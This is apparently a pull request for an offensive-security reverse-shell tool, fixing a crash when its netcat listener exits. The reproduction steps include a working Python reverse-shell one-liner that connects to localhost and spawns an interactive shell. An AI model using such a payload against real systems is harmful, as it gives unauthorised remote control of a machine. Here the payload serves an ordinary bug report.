### PR TITLE
Don't crash when netcat terminates

### DIFF
--- a/shellium.py
+++ b/shellium.py
@@ -309,7 +309,7 @@ def main_menu():
             print(ANSI.yellow_color() + "\nProcess manually aborted by user")
 
         try:
-            ANSI.green_color(call(nc, shell=True))
+            call(nc, shell=True)
         except KeyboardInterrupt:
             print(ANSI.yellow_color() + "\nProcess manually aborted by user")
 


### PR DESCRIPTION

### Steps to reproduce:
1. Create a reverse shell like this one:
```bash
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("127.0.0.1",9090));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
```
2. Tell Shellium to listen on port 9090
3. Open a new window and execute the reverse shell
4. Close the second window or type `exit` in the reverse shell
5. Note this error:
```
$ Traceback (most recent call last):
  File "/home/USERNAME/Desktop/shellium.py", line 331, in <module>
    main_menu()
  File "/home/USERNAME/Desktop/shellium.py", line 325, in main_menu
    listen()
  File "/home/USERNAME/Desktop/shellium.py", line 312, in listen
    ANSI.green_color(call(nc, shell=True))
TypeError: green_color() takes 0 positional arguments but 1 was given
```
I think this is because the function to show green text takes no args, and the output of the NetCat call was piped into it
Thus, I have tried to fix that in this PR. If this PR doesn't look right, you can always treat it as a issue report
Thank you